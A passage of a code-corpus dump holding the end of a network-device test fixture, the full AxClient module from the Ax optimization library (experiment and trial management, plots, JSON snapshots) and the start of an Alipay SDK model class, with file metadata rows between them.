'GigabitEthernet2.90':{
'interface': 'GigabitEthernet2.90',
"router_advertisement": {
"interval": 200,
"suppress": False,
"lifetime": 1800,
},
'neighbors': {
"FE80::F816:3EFF:FE0F:B2EC": {
"age": "2",
"ip": "FE80::F816:3EFF:FE0F:B2EC",
"link_layer_address": "fa16.3e0f.b2ec",
"neighbor_state": "STALE",
},
},
},
},
}
| 33.892473 | 72 | 0.36453 |
4a20fe60583f7103dfbfc1bd6af4d10ca1d15175 | 44,875 | py | Python | ax/service/ax_client.py | EricZLou/Ax | 3f8fc6f4a055e93cb69fda3799be41ee9572ef02 | ["MIT"] | null | null | null | ax/service/ax_client.py | EricZLou/Ax | 3f8fc6f4a055e93cb69fda3799be41ee9572ef02 | ["MIT"] | null | null | null | ax/service/ax_client.py | EricZLou/Ax | 3f8fc6f4a055e93cb69fda3799be41ee9572ef02 | ["MIT"] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import json
import logging
import warnings
from typing import Any, Dict, List, Optional, Tuple, Union
import ax.service.utils.best_point as best_point_utils
import numpy as np
import pandas as pd
from ax.core.arm import Arm
from ax.core.base_trial import BaseTrial
from ax.core.batch_trial import BatchTrial
from ax.core.data import Data
from ax.core.experiment import Experiment
from ax.core.generator_run import GeneratorRun
from ax.core.trial import Trial
from ax.core.types import (
TEvaluationOutcome,
TModelPredictArm,
TParameterization,
TParamValue,
)
from ax.modelbridge.dispatch_utils import choose_generation_strategy
from ax.modelbridge.generation_strategy import GenerationStrategy
from ax.modelbridge.modelbridge_utils import get_pending_observation_features
from ax.plot.base import AxPlotConfig
from ax.plot.contour import plot_contour
from ax.plot.exp_utils import exp_to_df
from ax.plot.feature_importances import plot_feature_importance_by_feature
from ax.plot.helper import _format_dict, _get_in_sample_arms
from ax.plot.trace import optimization_trace_single_method
from ax.service.utils.instantiation import (
data_from_evaluations,
make_experiment,
raw_data_to_evaluation,
)
from ax.service.utils.with_db_settings_base import DBSettings, WithDBSettingsBase
from ax.storage.json_store.decoder import (
generation_strategy_from_json,
object_from_json,
)
from ax.storage.json_store.encoder import object_to_json
from ax.utils.common.docutils import copy_doc
from ax.utils.common.logger import _round_floats_for_logging, get_logger
from ax.utils.common.typeutils import (
checked_cast,
checked_cast_dict,
checked_cast_optional,
not_none,
)
from botorch.utils.sampling import manual_seed
logger = get_logger(__name__)
class AxClient(WithDBSettingsBase):
"""
Convenience handler for management of experimentation cycle through a
service-like API. External system manages scheduling of the cycle and makes
calls to this client to get next suggestion in the experiment and log back
data from the evaluation of that suggestion.
Note: `AxClient` expects to only propose 1 arm (suggestion) per trial; support
for use cases that require use of batches is coming soon.
Two custom types used in this class for convenience are `TParamValue` and
`TParameterization`. Those are shortcuts for `Union[str, bool, float, int]`
and `Dict[str, Union[str, bool, float, int]]`, respectively.
Args:
generation_strategy: Optional generation strategy. If not set, one is
intelligently chosen based on properties of search space.
db_settings: Settings for saving and reloading the underlying experiment
to a database. Expected to be of type
ax.storage.sqa_store.structs.DBSettings and require SQLAlchemy.
enforce_sequential_optimization: Whether to enforce that when it is
reasonable to switch models during the optimization (as prescribed
by `num_trials` in generation strategy), Ax will wait for enough trials
to be completed with data to proceed. Defaults to True. If set to
False, Ax will keep generating new trials from the previous model
until enough data is gathered. Use this only if necessary;
otherwise, it is more resource-efficient to
optimize sequentially, by waiting until enough data is available to
use the next model.
random_seed: Optional integer random seed, set to fix the optimization
random seed for reproducibility. Works only for Sobol quasi-random
generator and for BoTorch-powered models. For the latter models, the
trials generated from the same optimization setup with the same seed,
will be mostly similar, but the exact parameter values may still vary
and trials latter in the optimizations will diverge more and more.
This is because a degree of randomness is essential for high performance
of the Bayesian optimization models and is not controlled by the seed.
Note: In multi-threaded environments, the random seed is thread-safe,
but does not actually guarantee reproducibility. Whether the outcomes
will be exactly the same for two same operations that use the random
seed, depends on whether the threads modify the random state in the
same order across the two operations.
verbose_logging: Whether Ax should log significant optimization events,
defaults to `True`.
suppress_storage_errors: Whether to suppress SQL storage-related errors if
            encountered. Only use if SQL storage is not important for the given use
            case, since this will only log, but not raise, an exception if it is
encountered while saving to DB or loading from it.
"""
def __init__(
self,
generation_strategy: Optional[GenerationStrategy] = None,
db_settings: Optional[DBSettings] = None,
enforce_sequential_optimization: bool = True,
random_seed: Optional[int] = None,
verbose_logging: bool = True,
suppress_storage_errors: bool = False,
) -> None:
super().__init__(db_settings=db_settings)
if not verbose_logging:
logger.setLevel(logging.WARNING) # pragma: no cover
else:
logger.info(
"Starting optimization with verbose logging. To disable logging, "
"set the `verbose_logging` argument to `False`. Note that float "
"values in the logs are rounded to 2 decimal points."
)
self._generation_strategy = generation_strategy
self._experiment: Optional[Experiment] = None
self._enforce_sequential_optimization = enforce_sequential_optimization
self._random_seed = random_seed
self._suppress_storage_errors = suppress_storage_errors
if random_seed is not None:
logger.warning(
f"Random seed set to {random_seed}. Note that this setting "
"only affects the Sobol quasi-random generator "
"and BoTorch-powered Bayesian optimization models. For the latter "
"models, setting random seed to the same number for two optimizations "
"will make the generated trials similar, but not exactly the same, "
"and over time the trials will diverge more."
)
# ------------------------ Public API methods. ------------------------
def create_experiment(
self,
parameters: List[Dict[str, Union[TParamValue, List[TParamValue]]]],
name: Optional[str] = None,
objective_name: Optional[str] = None,
minimize: bool = False,
parameter_constraints: Optional[List[str]] = None,
outcome_constraints: Optional[List[str]] = None,
status_quo: Optional[TParameterization] = None,
overwrite_existing_experiment: bool = False,
experiment_type: Optional[str] = None,
choose_generation_strategy_kwargs: Optional[Dict[str, Any]] = None,
) -> None:
"""Create a new experiment and save it if DBSettings available.
Args:
parameters: List of dictionaries representing parameters in the
experiment search space. Required elements in the dictionaries
are: "name" (name of this parameter, string), "type" (type of the
parameter: "range", "fixed", or "choice", string), and "bounds"
for range parameters (list of two values, lower bound first),
"values" for choice parameters (list of values), and "value" for
fixed parameters (single value).
            objective_name: Name of the metric used as objective in this experiment.
                This metric must be present in the `raw_data` argument to `complete_trial`.
name: Name of the experiment to be created.
minimize: Whether this experiment represents a minimization problem.
parameter_constraints: List of string representation of parameter
constraints, such as "x3 >= x4" or "-x3 + 2*x4 - 3.5*x5 >= 2". For
the latter constraints, any number of arguments is accepted, and
acceptable operators are "<=" and ">=".
outcome_constraints: List of string representation of outcome
constraints of form "metric_name >= bound", like "m1 <= 3."
status_quo: Parameterization of the current state of the system.
If set, this will be added to each trial to be evaluated alongside
test configurations.
overwrite_existing_experiment: If an experiment has already been set
on this `AxClient` instance, whether to reset it to the new one.
If overwriting the experiment, generation strategy will be
re-selected for the new experiment and restarted.
To protect experiments in production, one cannot overwrite existing
experiments if the experiment is already stored in the database,
regardless of the value of `overwrite_existing_experiment`.
choose_generation_strategy_kwargs: Keyword arguments to pass to
`choose_generation_strategy` function which determines what
generation strategy should be used when none was specified on init.
"""
if self.db_settings_set and not name:
raise ValueError( # pragma: no cover
"Must give the experiment a name if `db_settings` is not None."
)
if self.db_settings_set:
experiment, _ = self._load_experiment_and_generation_strategy(
experiment_name=not_none(name)
)
if experiment:
raise ValueError(
f"Experiment {name} already exists in the database. "
"To protect experiments that are running in production, "
"overwriting stored experiments is not allowed. To "
"start a new experiment and store it, change the "
"experiment's name."
)
if self._experiment is not None:
if overwrite_existing_experiment:
exp_name = self.experiment._name or "untitled"
new_exp_name = name or "untitled"
logger.info(
f"Overwriting existing experiment ({exp_name}) on this client "
f"with new experiment ({new_exp_name}) and restarting the "
"generation strategy."
)
self._generation_strategy = None
else:
raise ValueError(
"Experiment already created for this client instance. "
"Set the `overwrite_existing_experiment` to `True` to overwrite "
"with new experiment."
)
self._experiment = make_experiment(
name=name,
parameters=parameters,
objective_name=objective_name,
minimize=minimize,
parameter_constraints=parameter_constraints,
outcome_constraints=outcome_constraints,
status_quo=status_quo,
experiment_type=experiment_type,
)
try:
self._save_experiment_to_db_if_possible(
experiment=self.experiment,
suppress_all_errors=self._suppress_storage_errors,
)
except Exception:
            # Unset the experiment on this `AxClient` instance if saving the
            # experiment raised an error, to avoid a case where the overall
            # `create_experiment` call fails with a storage error, but
            # `self._experiment` is still set and the user has to specify the
            # `overwrite_existing_experiment` kwarg to re-attempt exp. creation.
self._experiment = None
raise
self._set_generation_strategy(
choose_generation_strategy_kwargs=choose_generation_strategy_kwargs
)
self._save_generation_strategy_to_db_if_possible(
generation_strategy=self.generation_strategy,
suppress_all_errors=self._suppress_storage_errors,
)
def get_next_trial(self) -> Tuple[TParameterization, int]:
"""
Generate trial with the next set of parameters to try in the iteration process.
Note: Service API currently supports only 1-arm trials.
Returns:
Tuple of trial parameterization, trial index
"""
trial = self.experiment.new_trial(generator_run=self._gen_new_generator_run())
logger.info(
f"Generated new trial {trial.index} with parameters "
f"{_round_floats_for_logging(item=not_none(trial.arm).parameters)}."
)
trial.mark_running(no_runner_required=True)
self._save_new_trial_to_db_if_possible(
experiment=self.experiment,
trial=trial,
suppress_all_errors=self._suppress_storage_errors,
)
self._save_generation_strategy_to_db_if_possible(
generation_strategy=self.generation_strategy,
suppress_all_errors=self._suppress_storage_errors,
)
return not_none(trial.arm).parameters, trial.index
def abandon_trial(self, trial_index: int, reason: Optional[str] = None) -> None:
"""Abandons a trial and adds optional metadata to it.
Args:
trial_index: Index of trial within the experiment.
"""
trial = self._get_trial(trial_index=trial_index)
trial.mark_abandoned(reason=reason)
def complete_trial(
self,
trial_index: int,
raw_data: TEvaluationOutcome,
metadata: Optional[Dict[str, Union[str, int]]] = None,
sample_size: Optional[int] = None,
) -> None:
"""
Completes the trial with given metric values and adds optional metadata
to it.
Args:
trial_index: Index of trial within the experiment.
raw_data: Evaluation data for the trial. Can be a mapping from
metric name to a tuple of mean and SEM, just a tuple of mean and
SEM if only one metric in optimization, or just the mean if there
is no SEM. Can also be a list of (fidelities, mapping from
metric name to a tuple of mean and SEM).
metadata: Additional metadata to track about this run.
sample_size: Number of samples collected for the underlying arm,
optional.
"""
# Validate that trial can be completed.
if not isinstance(trial_index, int): # pragma: no cover
raise ValueError(f"Trial index must be an int, got: {trial_index}.")
trial = self._get_trial(trial_index=trial_index)
self._validate_can_complete_trial(trial=trial)
# Format the data to save.
sample_sizes = {not_none(trial.arm).name: sample_size} if sample_size else {}
evaluations, data = self._make_evaluations_and_data(
trial=trial, raw_data=raw_data, metadata=metadata, sample_sizes=sample_sizes
)
trial._run_metadata = metadata or {}
self.experiment.attach_data(data=data)
trial.mark_completed()
data_for_logging = _round_floats_for_logging(
item=evaluations[next(iter(evaluations.keys()))]
)
logger.info(
f"Completed trial {trial_index} with data: "
f"{_round_floats_for_logging(item=data_for_logging)}."
)
self._save_updated_trial_to_db_if_possible(
experiment=self.experiment,
trial=trial,
suppress_all_errors=self._suppress_storage_errors,
)
def update_trial_data(
self,
trial_index: int,
raw_data: TEvaluationOutcome,
metadata: Optional[Dict[str, Union[str, int]]] = None,
sample_size: Optional[int] = None,
) -> None:
"""
Attaches additional data for completed trial (for example, if trial was
completed with data for only one of the required metrics and more data
needs to be attached).
Args:
trial_index: Index of trial within the experiment.
raw_data: Evaluation data for the trial. Can be a mapping from
metric name to a tuple of mean and SEM, just a tuple of mean and
SEM if only one metric in optimization, or just the mean if there
is no SEM. Can also be a list of (fidelities, mapping from
metric name to a tuple of mean and SEM).
metadata: Additional metadata to track about this run.
sample_size: Number of samples collected for the underlying arm,
optional.
"""
assert isinstance(
trial_index, int
), f"Trial index must be an int, got: {trial_index}." # pragma: no cover
trial = self._get_trial(trial_index=trial_index)
if not trial.status.is_completed:
raise ValueError(
f"Trial {trial.index} has not yet been completed with data."
"To complete it, use `ax_client.complete_trial`."
)
sample_sizes = {not_none(trial.arm).name: sample_size} if sample_size else {}
evaluations, data = self._make_evaluations_and_data(
trial=trial, raw_data=raw_data, metadata=metadata, sample_sizes=sample_sizes
)
trial._run_metadata.update(metadata or {})
# Registering trial data update is needed for generation strategies that
# leverage the `update` functionality of model and bridge setup and therefore
        # need to be aware of new data added to experiment. Usually this happens
# seamlessly, by looking at newly completed trials, but in this case trial
# status does not change, so we manually register the new data.
# Currently this call will only result in a `NotImplementedError` if generation
# strategy uses `update` (`GenerationStep.use_update` is False by default).
self.generation_strategy._register_trial_data_update(trial=trial, data=data)
self.experiment.attach_data(data, combine_with_last_data=True)
data_for_logging = _round_floats_for_logging(
item=evaluations[next(iter(evaluations.keys()))]
)
logger.info(
f"Added data: {_round_floats_for_logging(item=data_for_logging)} "
f"to trial {trial.index}."
)
self._save_experiment_to_db_if_possible(
experiment=self.experiment,
suppress_all_errors=self._suppress_storage_errors,
)
def log_trial_failure(
self, trial_index: int, metadata: Optional[Dict[str, str]] = None
) -> None:
"""Mark that the given trial has failed while running.
Args:
trial_index: Index of trial within the experiment.
metadata: Additional metadata to track about this run.
"""
trial = self.experiment.trials[trial_index]
trial.mark_failed()
logger.info(f"Registered failure of trial {trial_index}.")
if metadata is not None:
trial._run_metadata = metadata
self._save_experiment_to_db_if_possible(
experiment=self.experiment,
suppress_all_errors=self._suppress_storage_errors,
)
def attach_trial(
self, parameters: TParameterization
) -> Tuple[TParameterization, int]:
"""Attach a new trial with the given parameterization to the experiment.
Args:
parameters: Parameterization of the new trial.
Returns:
Tuple of parameterization and trial index from newly created trial.
"""
self._validate_search_space_membership(parameters=parameters)
trial = self.experiment.new_trial().add_arm(Arm(parameters=parameters))
trial.mark_running(no_runner_required=True)
logger.info(
"Attached custom parameterization "
f"{_round_floats_for_logging(item=parameters)} as trial {trial.index}."
)
self._save_new_trial_to_db_if_possible(
experiment=self.experiment,
trial=trial,
suppress_all_errors=self._suppress_storage_errors,
)
return not_none(trial.arm).parameters, trial.index
def get_trial_parameters(self, trial_index: int) -> TParameterization:
"""Retrieve the parameterization of the trial by the given index."""
return not_none(self._get_trial(trial_index).arm).parameters
@copy_doc(best_point_utils.get_best_parameters)
def get_best_parameters(
self,
) -> Optional[Tuple[TParameterization, Optional[TModelPredictArm]]]:
return best_point_utils.get_best_parameters(self.experiment)
def get_trials_data_frame(self) -> pd.DataFrame:
return exp_to_df(exp=self.experiment)
def get_max_parallelism(self) -> List[Tuple[int, int]]:
"""Retrieves maximum number of trials that can be scheduled in parallel
at different stages of optimization.
Some optimization algorithms profit significantly from sequential
optimization (i.e. suggest a few points, get updated with data for them,
repeat, see https://ax.dev/docs/bayesopt.html).
        Parallelism setting indicates how many trials should be running simultaneously
(generated, but not yet completed with data).
The output of this method is mapping of form
{num_trials -> max_parallelism_setting}, where the max_parallelism_setting
is used for num_trials trials. If max_parallelism_setting is -1, as
        many trials as necessary can be run in parallel. If num_trials
in a tuple is -1, then the corresponding max_parallelism_setting
should be used for all subsequent trials.
For example, if the returned list is [(5, -1), (12, 6), (-1, 3)],
the schedule could be: run 5 trials with any parallelism, run 6 trials in
parallel twice, run 3 trials in parallel for as long as needed. Here,
'running' a trial means obtaining a next trial from `AxClient` through
        get_next_trial and completing it with data when available.
Returns:
Mapping of form {num_trials -> max_parallelism_setting}.
"""
parallelism_settings = []
for step in self.generation_strategy._steps:
parallelism_settings.append(
(step.num_trials, step.max_parallelism or step.num_trials)
)
return parallelism_settings
def get_optimization_trace(
self, objective_optimum: Optional[float] = None
) -> AxPlotConfig:
"""Retrieves the plot configuration for optimization trace, which shows
the evolution of the objective mean over iterations.
Args:
objective_optimum: Optimal objective, if known, for display in the
visualization.
"""
if not self.experiment.trials:
raise ValueError("Cannot generate plot as there are no trials.")
objective_name = self.experiment.optimization_config.objective.metric.name
best_objectives = np.array(
[
[
checked_cast(Trial, trial).objective_mean
for trial in self.experiment.trials.values()
]
]
)
hover_labels = [
_format_dict(not_none(checked_cast(Trial, trial).arm).parameters)
for trial in self.experiment.trials.values()
]
return optimization_trace_single_method(
y=(
np.minimum.accumulate(best_objectives, axis=1)
if self.experiment.optimization_config.objective.minimize
else np.maximum.accumulate(best_objectives, axis=1)
),
optimum=objective_optimum,
title="Model performance vs. # of iterations",
ylabel=objective_name.capitalize(),
hover_labels=hover_labels,
)
def get_contour_plot(
self,
param_x: Optional[str] = None,
param_y: Optional[str] = None,
metric_name: Optional[str] = None,
) -> AxPlotConfig:
"""Retrieves a plot configuration for a contour plot of the response
surface. For response surfaces with more than two parameters,
selected two parameters will appear on the axes, and remaining parameters
will be affixed to the middle of their range. If contour params arguments
are not provided, the first two parameters in the search space will be
used. If contour metrics are not provided, objective will be used.
Args:
param_x: name of parameters to use on x-axis for
the contour response surface plots.
param_y: name of parameters to use on y-axis for
the contour response surface plots.
metric_name: Name of the metric, for which to plot the response
surface.
"""
if not self.experiment.trials:
raise ValueError("Cannot generate plot as there are no trials.")
if len(self.experiment.parameters) < 2:
raise ValueError(
"Cannot create a contour plot as experiment has less than 2 "
"parameters, but a contour-related argument was provided."
)
if (param_x or param_y) and not (param_x and param_y):
raise ValueError(
"If `param_x` is provided, `param_y` is "
"required as well, and vice-versa."
)
objective_name = self.objective_name
if not metric_name:
metric_name = objective_name
if not param_x or not param_y:
parameter_names = list(self.experiment.parameters.keys())
param_x = parameter_names[0]
param_y = parameter_names[1]
if param_x not in self.experiment.parameters:
raise ValueError(
f'Parameter "{param_x}" not found in the optimization search space.'
)
if param_y not in self.experiment.parameters:
raise ValueError(
f'Parameter "{param_y}" not found in the optimization search space.'
)
if metric_name not in self.experiment.metrics:
raise ValueError(
f'Metric "{metric_name}" is not associated with this optimization.'
)
if self.generation_strategy.model is not None:
try:
logger.info(
f"Retrieving contour plot with parameter '{param_x}' on X-axis "
f"and '{param_y}' on Y-axis, for metric '{metric_name}'. "
"Ramaining parameters are affixed to the middle of their range."
)
return plot_contour(
model=not_none(self.generation_strategy.model),
param_x=param_x,
param_y=param_y,
metric_name=metric_name,
)
except NotImplementedError:
# Some models don't implement '_predict', which is needed
# for the contour plots.
logger.info(
f"Model {self.generation_strategy.model} does not implement "
"`predict`, so it cannot be used to generate a response "
"surface plot."
)
raise ValueError(
f'Could not obtain contour plot of "{metric_name}" for parameters '
f'"{param_x}" and "{param_y}", as a model with predictive ability, '
"such as a Gaussian Process, has not yet been trained in the course "
"of this optimization."
)
def get_feature_importances(self, relative: bool = True) -> AxPlotConfig:
"""
Get a bar chart showing feature_importances for a metric.
A drop-down controls the metric for which the importances are displayed.
Args:
relative: Whether the values are displayed as percentiles or
as raw importance metrics.
"""
if not self.experiment.trials:
raise ValueError("Cannot generate plot as there are no trials.")
cur_model = self.generation_strategy.model
if cur_model is not None:
try:
return plot_feature_importance_by_feature(cur_model, relative=relative)
except NotImplementedError:
logger.info(
f"Model {self.generation_strategy.model} does not implement "
"`feature_importances`, so it cannot be used to generate "
"this plot. Only certain models, specifically GPEI, implement "
"feature importances."
)
raise ValueError(
"Could not obtain feature_importances for any metrics "
" as a model that can produce feature importances, such as a "
"Gaussian Process, has not yet been trained in the course "
"of this optimization."
)
def load_experiment_from_database(
self,
experiment_name: str,
choose_generation_strategy_kwargs: Optional[Dict[str, Any]] = None,
) -> None:
"""Load an existing experiment from database using the `DBSettings`
passed to this `AxClient` on instantiation.
Args:
experiment_name: Name of the experiment.
Returns:
Experiment object.
"""
experiment, generation_strategy = self._load_experiment_and_generation_strategy(
experiment_name=experiment_name
)
if experiment is None:
raise ValueError(f"Experiment by name '{experiment_name}' not found.")
self._experiment = experiment
logger.info(f"Loaded {experiment}.")
if generation_strategy is None: # pragma: no cover
self._set_generation_strategy(
choose_generation_strategy_kwargs=choose_generation_strategy_kwargs
)
else:
self._generation_strategy = generation_strategy
logger.info(
f"Using generation strategy associated with the loaded experiment:"
f" {generation_strategy}."
)
def get_model_predictions(
self, metric_names: Optional[List[str]] = None
) -> Dict[int, Dict[str, Tuple[float, float]]]:
"""Retrieve model-estimated means and covariances for all metrics.
Note: this function retrieves the predictions for the 'in-sample' arms,
which means that the return mapping on this function will only contain
predictions for trials that have been completed with data.
Args:
metric_names: Names of the metrics, for which to retrieve predictions.
All metrics on experiment will be retrieved if this argument was
not specified.
Returns:
A mapping from trial index to a mapping of metric names to tuples
of predicted metric mean and SEM, of form:
{ trial_index -> { metric_name: ( mean, SEM ) } }.
"""
if self.generation_strategy.model is None: # pragma: no cover
raise ValueError("No model has been instantiated yet.")
if metric_names is None and self.experiment.metrics is None:
raise ValueError( # pragma: no cover
"No metrics to retrieve specified on the experiment or as "
"argument to `get_model_predictions`."
)
arm_info, _, _ = _get_in_sample_arms(
model=not_none(self.generation_strategy.model),
metric_names=set(metric_names)
if metric_names is not None
else set(not_none(self.experiment.metrics).keys()),
)
trials = checked_cast_dict(int, Trial, self.experiment.trials)
return {
trial_index: {
m: (
arm_info[not_none(trials[trial_index].arm).name].y_hat[m],
arm_info[not_none(trials[trial_index].arm).name].se_hat[m],
)
for m in arm_info[not_none(trials[trial_index].arm).name].y_hat
}
for trial_index in trials
if not_none(trials[trial_index].arm).name in arm_info
}
def verify_trial_parameterization(
self, trial_index: int, parameterization: TParameterization
) -> bool:
"""Whether the given parameterization matches that of the arm in the trial
specified in the trial index.
"""
return (
not_none(self._get_trial(trial_index=trial_index).arm).parameters
== parameterization
)
# ------------------ JSON serialization & storage methods. -----------------
def save_to_json_file(self, filepath: str = "ax_client_snapshot.json") -> None:
"""Save a JSON-serialized snapshot of this `AxClient`'s settings and state
to a .json file by the given path.
"""
with open(filepath, "w+") as file: # pragma: no cover
file.write(json.dumps(self.to_json_snapshot()))
logger.info(f"Saved JSON-serialized state of optimization to `{filepath}`.")
@staticmethod
def load_from_json_file(
filepath: str = "ax_client_snapshot.json", **kwargs
) -> "AxClient":
"""Restore an `AxClient` and its state from a JSON-serialized snapshot,
residing in a .json file by the given path.
"""
with open(filepath, "r") as file: # pragma: no cover
serialized = json.loads(file.read())
return AxClient.from_json_snapshot(serialized=serialized, **kwargs)
def to_json_snapshot(self) -> Dict[str, Any]:
"""Serialize this `AxClient` to JSON to be able to interrupt and restart
optimization and save it to file by the provided path.
Returns:
A JSON-safe dict representation of this `AxClient`.
"""
return {
"_type": self.__class__.__name__,
"experiment": object_to_json(self._experiment),
"generation_strategy": object_to_json(self._generation_strategy),
"_enforce_sequential_optimization": self._enforce_sequential_optimization,
}
@staticmethod
def from_json_snapshot(serialized: Dict[str, Any], **kwargs) -> "AxClient":
"""Recreate an `AxClient` from a JSON snapshot."""
experiment = object_from_json(serialized.pop("experiment"))
serialized_generation_strategy = serialized.pop("generation_strategy")
ax_client = AxClient(
generation_strategy=generation_strategy_from_json(
generation_strategy_json=serialized_generation_strategy
)
if serialized_generation_strategy is not None
else None,
enforce_sequential_optimization=serialized.pop(
"_enforce_sequential_optimization"
),
**kwargs,
)
ax_client._experiment = experiment
return ax_client
# ---------------------- Private helper methods. ---------------------
@property
def experiment(self) -> Experiment:
"""Returns the experiment set on this Ax client."""
if self._experiment is None:
raise ValueError(
"Experiment not set on Ax client. Must first "
"call load_experiment or create_experiment to use handler functions."
)
return not_none(self._experiment)
@property
def generation_strategy(self) -> GenerationStrategy:
"""Returns the generation strategy, set on this experiment."""
if self._generation_strategy is None:
raise ValueError(
"No generation strategy has been set on this optimization yet."
)
return not_none(self._generation_strategy)
@property
def objective_name(self) -> str:
"""Returns the name of the objective in this optimization."""
opt_config = not_none(self.experiment.optimization_config)
return opt_config.objective.metric.name
def _set_generation_strategy(
self, choose_generation_strategy_kwargs: Optional[Dict[str, Any]] = None
) -> None:
"""Selects the generation strategy and applies specified dispatch kwargs,
if any.
"""
choose_generation_strategy_kwargs = choose_generation_strategy_kwargs or {}
random_seed = choose_generation_strategy_kwargs.pop(
"random_seed", self._random_seed
)
enforce_sequential_optimization = choose_generation_strategy_kwargs.pop(
"enforce_sequential_optimization", self._enforce_sequential_optimization
)
if self._generation_strategy is None:
self._generation_strategy = choose_generation_strategy(
search_space=self.experiment.search_space,
enforce_sequential_optimization=enforce_sequential_optimization,
random_seed=random_seed,
**choose_generation_strategy_kwargs,
)
def _gen_new_generator_run(self, n: int = 1) -> GeneratorRun:
"""Generate new generator run for this experiment.
Args:
n: Number of arms to generate.
"""
# If random seed is not set for this optimization, context manager does
# nothing; otherwise, it sets the random seed for torch, but only for the
# scope of this call. This is important because torch seed is set globally,
# so if we just set the seed without the context manager, it can have
# serious negative impact on the performance of the models that employ
# stochasticity.
        with manual_seed(seed=self._random_seed), warnings.catch_warnings():
# Filter out GPYTorch warnings to avoid confusing users.
warnings.simplefilter("ignore")
return not_none(self.generation_strategy).gen(
experiment=self.experiment,
n=n,
pending_observations=get_pending_observation_features(
experiment=self.experiment
),
)
def _get_trial(self, trial_index: int) -> Trial:
"""Gets trial by given index or raises an error if it does not exist."""
if trial_index in self.experiment.trials:
trial = self.experiment.trials.get(trial_index)
if not isinstance(trial, Trial):
raise NotImplementedError(
"`AxClient` only supports `Trial`, not `BatchTrial`."
)
return trial
raise ValueError(f"Trial {trial_index} does not yet exist.")
def _find_last_trial_with_parameterization(
self, parameterization: TParameterization
) -> int:
"""Given a parameterization, find the last trial in the experiment that
contains an arm with that parameterization.
"""
for trial_idx in sorted(self.experiment.trials.keys(), reverse=True):
if not_none(self._get_trial(trial_idx).arm).parameters == parameterization:
return trial_idx
raise ValueError(
f"No trial on experiment matches parameterization {parameterization}."
)
def _make_evaluations_and_data(
self,
trial: BaseTrial,
raw_data: Union[TEvaluationOutcome, Dict[str, TEvaluationOutcome]],
metadata: Optional[Dict[str, Union[str, int]]],
sample_sizes: Optional[Dict[str, int]] = None,
) -> Tuple[Dict[str, TEvaluationOutcome], Data]:
"""Formats given raw data as Ax evaluations and `Data`.
Args:
trial: Trial within the experiment.
raw_data: Metric outcomes for 1-arm trials, map from arm name to
metric outcomes for batched trials.
            sample_sizes: Optional mapping from arm name to the number of
                samples collected for that arm.
            metadata: Additional metadata to track about this run.
"""
if isinstance(trial, BatchTrial):
assert isinstance( # pragma: no cover
raw_data, dict
), "Raw data must be a dict for batched trials."
elif isinstance(trial, Trial):
arm_name = not_none(trial.arm).name
raw_data = {arm_name: raw_data} # pyre-ignore[9]
else: # pragma: no cover
raise ValueError(f"Unexpected trial type: {type(trial)}.")
assert isinstance(raw_data, dict)
evaluations = {
arm_name: raw_data_to_evaluation(
raw_data=raw_data[arm_name], objective_name=self.objective_name
)
for arm_name in raw_data
}
data = data_from_evaluations(
evaluations=evaluations,
trial_index=trial.index,
sample_sizes=sample_sizes or {},
start_time=(
checked_cast_optional(int, metadata.get("start_time"))
if metadata is not None
else None
),
end_time=(
checked_cast_optional(int, metadata.get("end_time"))
if metadata is not None
else None
),
)
return evaluations, data
# ------------------------------ Validators. -------------------------------
@staticmethod
def _validate_can_complete_trial(trial: BaseTrial) -> None:
if trial.status.is_completed:
raise ValueError(
f"Trial {trial.index} has already been completed with data."
"To add more data to it (for example, for a different metric), "
"use `ax_client.update_trial_data`."
)
if trial.status.is_abandoned or trial.status.is_failed:
raise ValueError(
f"Trial {trial.index} has been marked {trial.status.name}, so it "
"no longer expects data."
)
def _validate_search_space_membership(self, parameters: TParameterization) -> None:
self.experiment.search_space.check_membership(
parameterization=parameters, raise_error=True
)
# `check_membership` uses int and float interchangeably, which we don't
# want here.
for p_name, parameter in self.experiment.search_space.parameters.items():
if not isinstance(parameters[p_name], parameter.python_type):
typ = type(parameters[p_name])
raise ValueError(
f"Value for parameter {p_name} is of type {typ}, expected "
f"{parameter.python_type}. If the intention was to have the "
f"parameter on experiment be of type {typ}, set `value_type` "
f"on experiment creation for {p_name}."
)
# -------- Backward-compatibility with old save / load method names. -------
@staticmethod
def get_recommended_max_parallelism() -> None:
raise NotImplementedError(
"Use `get_max_parallelism` instead; parallelism levels are now "
"enforced in generation strategy, so max parallelism is no longer "
"just recommended."
)
@staticmethod
def load_experiment(experiment_name: str) -> None:
raise NotImplementedError(
"Use `load_experiment_from_database` to load from SQL database or "
"`load_from_json_file` to load optimization state from .json file."
)
@staticmethod
def load(filepath: Optional[str] = None) -> None:
raise NotImplementedError(
"Use `load_experiment_from_database` to load from SQL database or "
"`load_from_json_file` to load optimization state from .json file."
)
@staticmethod
def save(filepath: Optional[str] = None) -> None:
raise NotImplementedError(
"Use `save_to_json_file` to save optimization state to .json file."
)
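    # Hedged usage sketch (not part of the original file): the shape that
    # `_make_evaluations_and_data` expects `raw_data` to be normalized into.
    # The arm name and metric values below are made up for illustration.
    #
    #     raw_data = (0.92, 0.01)        # (mean, SEM) for a 1-arm Trial
    #     per_arm = {"0_0": raw_data}    # the method keys it by arm name
    #     # For a BatchTrial, callers must already pass a per-arm dict like
    #     # `per_arm`; anything else trips the assertion in the method above.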
| 44.91992 | 88 | 0.634585 |
4a21009e61bad04973ec5c982ad0b2dae0b2ea9e | 1,849 | py | Python | alipay/aop/api/domain/AlipayOpenAppMessageSubscriptionQueryModel.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | ["Apache-2.0"] | 1 | 2022-03-07T06:11:10.000Z | 2022-03-07T06:11:10.000Z | alipay/aop/api/domain/AlipayOpenAppMessageSubscriptionQueryModel.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | ["Apache-2.0"] | null | null | null | alipay/aop/api/domain/AlipayOpenAppMessageSubscriptionQueryModel.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | ["Apache-2.0"] | 1 | 2021-10-05T03:01:09.000Z | 2021-10-05T03:01:09.000Z |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayOpenAppMessageSubscriptionQueryModel(object):
def __init__(self):
self._auth_token = None
self._auth_type = None
self._topic = None
@property
def auth_token(self):
return self._auth_token
@auth_token.setter
def auth_token(self, value):
self._auth_token = value
@property
def auth_type(self):
